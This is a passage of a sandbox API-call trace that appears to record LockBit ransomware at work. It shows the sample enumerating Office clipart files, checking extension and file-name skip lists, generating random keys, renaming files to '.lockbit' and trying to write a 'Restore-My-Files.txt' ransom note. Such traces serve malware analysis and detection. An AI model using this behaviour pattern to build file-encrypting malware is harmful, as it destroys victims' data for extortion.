NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0113.625] malloc (_Size=0xa6) returned 0x77d7a8 [0113.625] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0113.642] free (_Block=0x77d7a8) [0113.642] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0113.642] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0113.642] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0113.643] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1dc9900, ftCreationTime.dwHighDateTime=0x1bd4b18, ftLastAccessTime.dwLowDateTime=0x51fbcc50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc1dc9900, ftLastWriteTime.dwHighDateTime=0x1bd4b18, nFileSizeHigh=0x0, nFileSizeLow=0x1a7c, dwReserved0=0x0, dwReserved1=0x0, cFileName="EN00242_.WMF", cAlternateFileName="")) returned 1 [0113.643] lstrcmpiW (lpString1=".", lpString2="EN00242_.WMF") returned -1 [0113.643] lstrcmpiW (lpString1="..", lpString2="EN00242_.WMF") returned -1 [0113.643] PathFindExtensionW (pszPath="EN00242_.WMF") returned=".WMF" [0113.643] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0113.643] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0113.643] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0113.643] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0113.643] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0113.643] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0113.643] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0113.643] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0113.643] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0113.643] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0113.643] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0113.643] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0113.643] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0113.643] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0113.643] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0113.643] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0113.643] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0113.643] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0113.643] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0113.643] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0113.643] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0113.644] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0113.644] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0113.644] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0113.644] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.644] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0113.644] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0113.644] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0113.644] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0113.644] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0113.644] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0113.644] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0113.644] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0113.644] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0113.644] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0113.644] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0113.644] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0113.644] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0113.644] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0113.644] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0113.644] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0113.644] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0113.644] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.644] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0113.644] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0113.644] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0113.644] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0113.645] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="EN00242_.WMF") returned 1 [0113.645] lstrcmpiW (lpString1="ntldr", lpString2="EN00242_.WMF") returned 1 [0113.645] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="EN00242_.WMF") returned 1 [0113.645] lstrcmpiW (lpString1="bootsect.bak", lpString2="EN00242_.WMF") returned -1 [0113.645] lstrcmpiW (lpString1="autorun.inf", lpString2="EN00242_.WMF") returned -1 [0113.645] lstrcmpiW (lpString1="thumbs.db", lpString2="EN00242_.WMF") returned 1 [0113.645] lstrcmpiW (lpString1="iconcache.db", lpString2="EN00242_.WMF") returned 1 [0113.645] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0113.645] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF") returned=".WMF" [0113.645] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0113.645] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0113.645] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0113.645] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0113.645] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0113.645] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0113.645] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0113.645] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0113.645] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0113.645] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0113.645] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0113.645] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0113.645] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0113.645] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0113.645] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0113.645] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0113.646] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0113.646] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0113.646] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0113.646] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0113.646] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0113.646] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0113.646] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0113.646] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0113.646] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0113.646] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0113.646] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0113.646] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0113.646] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF.lockbit") returned 72 [0113.646] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00242_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0113.648] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0113.648] malloc (_Size=0x40068) returned 0x1ff1e60 [0113.649] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=6780) returned 1 [0113.649] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.650] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.650] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0113.650] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.651] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.651] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0113.651] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.700] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0113.701] malloc (_Size=0xa6) returned 0x77d7a8 [0113.701] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0113.707] free (_Block=0x77d7a8) [0113.707] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0113.707] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0113.707] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0113.707] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7ec7300, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x51fbcc50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb7ec7300, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x8e8, dwReserved0=0x0, dwReserved1=0x0, cFileName="EN00319_.WMF", cAlternateFileName="")) returned 1 [0113.707] lstrcmpiW (lpString1=".", lpString2="EN00319_.WMF") returned -1 [0113.707] lstrcmpiW (lpString1="..", lpString2="EN00319_.WMF") returned -1 [0113.707] PathFindExtensionW (pszPath="EN00319_.WMF") returned=".WMF" [0113.708] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0113.708] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0113.708] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0113.708] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0113.708] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0113.708] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0113.708] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0113.708] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0113.708] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0113.708] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0113.708] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0113.708] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0113.708] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0113.708] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0113.708] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0113.708] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0113.708] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0113.708] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0113.708] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0113.708] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0113.708] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0113.708] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0113.708] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0113.708] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0113.708] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.709] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0113.709] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0113.709] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0113.709] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0113.709] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0113.709] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0113.709] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0113.709] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0113.709] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0113.709] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0113.709] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0113.709] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0113.709] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0113.709] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0113.709] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0113.709] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0113.709] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0113.709] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.709] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0113.709] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0113.709] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0113.709] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0113.709] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="EN00319_.WMF") returned 1 [0113.709] lstrcmpiW (lpString1="ntldr", lpString2="EN00319_.WMF") returned 1 [0113.709] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="EN00319_.WMF") returned 1 [0113.710] lstrcmpiW (lpString1="bootsect.bak", lpString2="EN00319_.WMF") returned -1 [0113.710] lstrcmpiW (lpString1="autorun.inf", lpString2="EN00319_.WMF") returned -1 [0113.710] lstrcmpiW (lpString1="thumbs.db", lpString2="EN00319_.WMF") returned 1 [0113.710] lstrcmpiW (lpString1="iconcache.db", lpString2="EN00319_.WMF") returned 1 [0113.710] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0113.710] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF") returned=".WMF" [0113.710] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0113.710] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0113.710] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0113.710] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0113.710] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0113.710] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0113.710] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0113.710] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0113.710] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0113.710] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0113.710] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0113.710] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0113.710] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0113.710] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0113.710] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0113.710] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0113.710] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0113.710] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0113.711] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0113.711] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0113.711] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0113.711] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0113.711] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0113.711] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0113.711] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0113.711] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0113.711] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0113.711] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0113.711] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF.lockbit") returned 72 [0113.711] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00319_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0113.712] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0113.712] malloc (_Size=0x40068) returned 0x1ff1e60 [0113.712] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=2280) returned 1 [0113.712] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.713] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.713] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0113.713] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.713] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.713] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0113.713] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0113.732] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0113.732] malloc (_Size=0xa6) returned 0x77d7a8 [0113.732] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0113.732] free (_Block=0x77d7a8) [0113.732] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0113.732] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0113.732] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0113.732] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24bc3900, ftCreationTime.dwHighDateTime=0x1bd4af5, ftLastAccessTime.dwLowDateTime=0x51fbcc50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x24bc3900, ftLastWriteTime.dwHighDateTime=0x1bd4af5, nFileSizeHigh=0x0, nFileSizeLow=0x2e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EN00320_.WMF", cAlternateFileName="")) returned 1 [0113.732] lstrcmpiW (lpString1=".", lpString2="EN00320_.WMF") returned -1 [0113.732] lstrcmpiW (lpString1="..", lpString2="EN00320_.WMF") returned -1 [0113.732] PathFindExtensionW (pszPath="EN00320_.WMF") returned=".WMF" [0113.732] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0113.732] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0113.732] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0113.732] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0113.732] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0113.732] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0113.732] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0113.732] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0113.733] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0113.733] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0113.733] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0113.733] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0113.733] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0113.733] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0113.733] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0113.733] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0113.733] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0113.733] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0113.733] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0113.733] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0113.733] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0113.733] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0113.733] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0113.733] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0113.733] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.733] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0113.733] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0113.733] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0113.733] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0113.733] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0113.733] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0113.733] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0113.733] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0113.733] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0113.733] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0113.733] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0113.734] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0113.734] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0113.734] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0113.734] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0113.734] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0113.734] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0113.734] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.734] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0113.734] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0113.734] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0113.734] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0113.734] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="EN00320_.WMF") returned 1 [0113.734] lstrcmpiW (lpString1="ntldr", lpString2="EN00320_.WMF") returned 1 [0113.734] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="EN00320_.WMF") returned 1 [0113.734] lstrcmpiW (lpString1="bootsect.bak", lpString2="EN00320_.WMF") returned -1 [0113.734] lstrcmpiW (lpString1="autorun.inf", lpString2="EN00320_.WMF") returned -1 [0113.734] lstrcmpiW (lpString1="thumbs.db", lpString2="EN00320_.WMF") returned 1 [0113.734] lstrcmpiW (lpString1="iconcache.db", lpString2="EN00320_.WMF") returned 1 [0113.734] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0113.734] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft 